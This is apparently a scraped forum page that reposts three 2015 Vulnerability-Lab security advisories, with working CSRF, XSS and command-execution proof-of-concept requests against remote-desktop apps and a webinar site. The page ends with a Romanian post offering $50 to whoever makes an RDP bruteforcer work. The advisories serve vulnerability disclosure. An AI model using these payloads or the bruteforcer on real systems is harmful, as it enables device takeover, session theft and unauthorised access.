Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 true Send SMS: --- PoC Session Logs [GET] (Execution) --- <img src="http://localhost:8999/sendSMS.json?to=333&content=Hello""width="0" height="0" border="0"> GET /sendSMS.json?to=333&content=Hello HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 SMS to 333 sent successfully Create File: --- PoC Session Logs [GET] (Execution) --- <img src="http://localhost:8999/addTextFile.json?id=/folder&name=file" width="0" height="0" border="0"> GET /addTextFile.json?id=/folder/&name=file HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 26 /folder/file Delete File: <img src="http://localhost:8999/deleteFile.json?id=/file" width="0" height="0" border="0"> GET /deleteFile.json?id=%2Fmnt%2Femmc%2Faissak%7C HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: RemoteMobileSession=-658409909345357946 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 true Reference: http://localhost:8999/ 1.2 The application-side input validation web vulnerabilities can be exploited by local low privileged application account or remote attackers with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Application-Side Cross Site Scripting --- PoC Session Logs [GET] (Execution) --- GET /sendSMS.json?to=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&content=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&uid=1421297818963 HTTP/1.1 Host: 192.168.1.3:8999 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: text/plain; charset=utf-8 Referer: http://192.168.1.3:8999/ Cookie: RemoteMobileSession=-6603034196170561541 Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 68 SMS to <img src=x onerror=alert(/XSS/)> sent failed: Unknown Error --- PoC Session Logs [GET] (Execution) --- Create new a contact or a contact group with the payload as name "<img src=x onerror=alert(/XSS/)>" and click the contact button to save Reference: http://localhost:8999/ Security Risk: ============== 1.1 The security risk of the cross site request forgery web vulnerabilities are estimated as medium. (CVSS 2.2) 1.2 The security risk of the application-side input validation web vulnerability is estimated as medium. (CVSS 2.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting ? Packet Storm
-
Document Title: =============== Webinars v2.2.26.0 - Client Side Cross Site Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1412 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1412 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== http://www.webinars.com Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the Webinars v2.2.26.0 conference web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official InterCall Webinar v2.2.26.0 conference web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin session data by client-side cross site requests. The vulnerability is located in the `meeting_id` value of the `viewer.php` file. Remote attackers are able to inject malicious script codes to client-side web-application requests. Remote attackers uses a validation error in the viewer.php file to execute client-side script code in the webinar web-application context. The client-side script code execution occurs in the same file after a site refresh. The attack vector is located on the client-side of the service and the request method to inject the script code is `GET`. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side remote vulnerability requires low or medium user interaction and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and client-side manipulation of affected and connected module web context. Vulnerable Service(s): [+] Webinars Vulnerable File(s): [+] viewer.php Vulnerable Parameter(s): [+] meeting_id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged applicaiton user account and low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs [GET] --- GET /viewer.php?meeting_id=%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E HTTP/1.1 Host: webinars.snm.org - User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - HTTP/1.1 200 OK Date: Fri, 16 Jan 2015 18:10:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 3044 Connection: close Content-Type: text/html; charset=UTF-8 PoC: Webinar <body > <div id='message_box' class='message' style='visibility:hidden'> <div class='box_header'><a onclick="ShowMessage(false, ''); return false;" href='javascript:void(0)'> [ X ]</a></div> <p id='message_text'> </p> </div> <div id='page_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowPageBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='page_content' src=''></iframe> </div> <div id='sharing_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowSharingBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='sharing_content' src=''></iframe>[CLIENT-SIDE SCRIPT CODE EXECUTION!] </div> <div id="flashcontent"> <object id="viewer" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%"> <param name="flashvars" value="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" /> <param name="movie" value="viewer.swf?1719627766" /> <param name="swliveconnect" value="true" /> <param name="wmode" value="opaque" /> <param name="allowScriptAccess" value="always" /> <param name="allowFullScreen" value="true" /> <object data="viewer.swf?1719627766" flashvars="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" width="100%" height="100%" swliveconnect=true name="viewer" wmode="opaque" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> <div class="noflash"> <p>You need the latest version of the Adobe Flash Player.<p/> <p><a target=_blank href="https://www.adobe.com/go/getflashplayer"><img src="https://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p> </div> </object> </object> </div> </body> Reference(s): http://localhost:80/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://www.xxx.com/meet/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinar.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinars.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable `meeting_id` value in the viewer.php file. Restrict the input and disallow special chars and parse the output to prevent an execution of client-side injected script codes. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the webinar conference application is estimated as medium. (CVSS 2.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Webinars 2.2.26.0 Script Insertion ? Packet Storm
-
- client-side
- remote
-
(and 3 more)
Tagged with:
-
Document Title: =============== Remote Desktop v0.9.4 Android - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1413 Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1413 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== Remote Desktop brings order to your Droid. View and retrieve all the contents of your phone such as documents, photos, videos. All you need is a standard web browser (! the latest Chrome or Firefox !) and Remote Desktop will allow you interact with your phone as easily as a PC. (Copy of the Homepage: http://remote-desktop.android.informer.com/0.9.4/ & https://play.google.com/store/apps/details?id=pl.androiddev.mobiletab ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Desktop v0.9.4 Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Damian Kolakowski Product: Remote Desktop - Android Mobile Web Application 0.9.4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple vulnerabilities has been discovered in the Remote Desktop v0.9.4 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. 1.1 The local command injection vulnerability is located in `cmd` value of the `/api/sms` file. The remote attackers performs a client-side request and manipulates the `cmd` value to compromise the web-app by a local command injection. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.5. Exploitation of the command/path inject vulnerability requires no privileged android device user account or user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile android application and the connected device. Request Method(s): [+] [GET] Vulnerable Module(s): [+] /api/sms Vulnerable Parameter(s): [+] cmd=%3Cform%20action=api/[x]?cmd= 1.2 The cross site request forgery vulnerabilities are located in the `shell`,`sms`,`calllogs` and `files` sections of the android app. Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add, call, send). The requst method to execute a function in a client-side request is GET. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side web vulnerability requires no privileged web-application user account but medium or high user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] shell [+] sms [+] calllogs Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. [REMOTE SHELL CODE EXECUTE VULNERABILI! CSRF ] <img src="http://localhost:8080/api/shell?cmd=execute&command=id&token=111111111111" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/shell?cmd=execute&command=id&token=111111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","working-directory":"\/","stderr":"","stdout":"uid=10257(u0_a257) gid=10257(u0_a257) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)\n"} Send SMS <img src="http://localhost:8080/api/sms?cmd=send&token=111111111111&to=333&message=HELLO " width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=send&token=111111111111&to=333&message=HELLO HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421469722760 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","results":[{"id":1590,"address":"333"}], "thread":{"id":51,"read":false,"snippet":"HELLO","recipients_snippet":"333", "message_count":70,"date":1421476972278,"recipients":[{"id":51,"address":"333"}]}} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=0674086422 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete File <img src="http://localhost:8080/api/files?cmd=delete&sep=/&path=/file" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/files?cmd=delete&sep=/&path=%2Fstorage%2Femmc%2FRWDFv5.9.5.apk HTTP/1.1 Host: 192.168.1.6:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421449820153 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=11111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete all SMS <img src="http://localhost:8080/api/sms?cmd=delete_all" width="0" height="0" border="0"> GET /api/sms?cmd=delete_all HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} LOCAL COMMAND INJECTION VULNERABILITY shell?, sms?, calllogs?files? --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=%3Cform%20action=api/sms?cmd=[LOCAL COMMAND INJECTION VULNERABILITY!] HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response {"response":"OK"} HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"Unknown command: [LOCAL COMMAND INJECTION VULNERABILITY!]"} Reference: http://localhost:8080/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Remote Desktop 0.9.4 Android CSRF / Command Injection ? Packet Storm
-
ofer 50$ celui care face programul asta sa mearga: Download fastw.zip from Sendspace.com - send big files the easy way pentru cei care nu stiu despre ce este vorba .. aveti aici o poza: PS: nu stiu cat de clean e, asa ca va sfatuiesc sa il rulati in virtual box
-
- bruteforcer
- rdp
-
(and 1 more)
Tagged with: